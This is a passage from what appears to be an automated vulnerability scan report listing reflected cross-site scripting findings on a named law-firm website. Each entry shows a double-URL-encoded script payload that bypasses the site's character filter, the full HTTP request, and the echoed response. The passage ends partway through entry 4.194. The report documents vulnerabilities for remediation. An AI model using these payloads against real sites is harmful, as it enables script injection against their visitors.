Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js67315"><script>alert(1)</script>635a97b6d45/jquery.js" value="">
...[SNIP]...

4.180. http://www.wileyrein.com/js/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d was submitted in the REST URL parameter 2. This input was echoed as d428a"><script>alert(1)</script>229db4da92d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/jquery.jsd428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/jquery.jsd428a"><script>alert(1)</script>229db4da92d" value="">
...[SNIP]...

4.181. http://www.wileyrein.com/js/menu.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/menu.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24 was submitted in the REST URL parameter 1. This input was echoed as a0519"><script>alert(1)</script>056a75bdc24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsa0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24/menu.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsa0519"><script>alert(1)</script>056a75bdc24/menu.js" value="">
...[SNIP]...

4.182. http://www.wileyrein.com/js/menu.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/menu.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 was submitted in the REST URL parameter 2. This input was echoed as 72b32"><script>alert(1)</script>99218231cb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/menu.js72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/menu.js72b32"><script>alert(1)</script>99218231cb0" value="">
...[SNIP]...

4.183. http://www.wileyrein.com/js/script.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/script.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc was submitted in the REST URL parameter 1. This input was echoed as 651f5"><script>alert(1)</script>51a543addfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc/script.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js651f5"><script>alert(1)</script>51a543addfc/script.js" value="">
...[SNIP]...

4.184. http://www.wileyrein.com/js/script.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/script.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c was submitted in the REST URL parameter 2. This input was echoed as a9d57"><script>alert(1)</script>6a7d4ade41c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/script.jsa9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/script.jsa9d57"><script>alert(1)</script>6a7d4ade41c" value="">
...[SNIP]...

4.185. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.core.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079 was submitted in the REST URL parameter 1. This input was echoed as 2bbc8"><script>alert(1)</script>5280505d079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079/ui.core.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js2bbc8"><script>alert(1)</script>5280505d079/ui.core.js" value="">
...[SNIP]...

4.186. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.core.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 was submitted in the REST URL parameter 2. This input was echoed as 79a0d"><script>alert(1)</script>713c91dcce2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.core.js79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.core.js79a0d"><script>alert(1)</script>713c91dcce2" value="">
...[SNIP]...

4.187. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.datepicker.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d was submitted in the REST URL parameter 1. This input was echoed as 33f74"><script>alert(1)</script>75df592a80d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d/ui.datepicker.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js33f74"><script>alert(1)</script>75df592a80d/ui.datepicker.js" value="">
...[SNIP]...

4.188. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.datepicker.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea was submitted in the REST URL parameter 2. This input was echoed as 29ad5"><script>alert(1)</script>e294e4483ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.datepicker.js29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.datepicker.js29ad5"><script>alert(1)</script>e294e4483ea" value="">
...[SNIP]...

4.189. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.dialog.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd was submitted in the REST URL parameter 1. This input was echoed as fe969"><script>alert(1)</script>c77ca9823dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsfe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd/ui.dialog.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsfe969"><script>alert(1)</script>c77ca9823dd/ui.dialog.js" value="">
...[SNIP]...

4.190. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.dialog.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de was submitted in the REST URL parameter 2. This input was echoed as 4ae75"><script>alert(1)</script>6ccc3364de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.dialog.js4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.dialog.js4ae75"><script>alert(1)</script>6ccc3364de" value="">
...[SNIP]...

4.191. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.draggable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed was submitted in the REST URL parameter 1. This input was echoed as 41fbd"><script>alert(1)</script>3ba108ca8ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed/ui.draggable.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js41fbd"><script>alert(1)</script>3ba108ca8ed/ui.draggable.js" value="">
...[SNIP]...

4.192. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.draggable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 was submitted in the REST URL parameter 2. This input was echoed as ee808"><script>alert(1)</script>982f7a16b81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.draggable.jsee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.draggable.jsee808"><script>alert(1)</script>982f7a16b81" value="">
...[SNIP]...

4.193. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.resizable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e was submitted in the REST URL parameter 1. This input was echoed as 159bb"><script>alert(1)</script>ff8afb5f36e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e/ui.resizable.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js159bb"><script>alert(1)</script>ff8afb5f36e/ui.resizable.js" value="">
...[SNIP]...

4.194. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.resizable.js

Issue detail

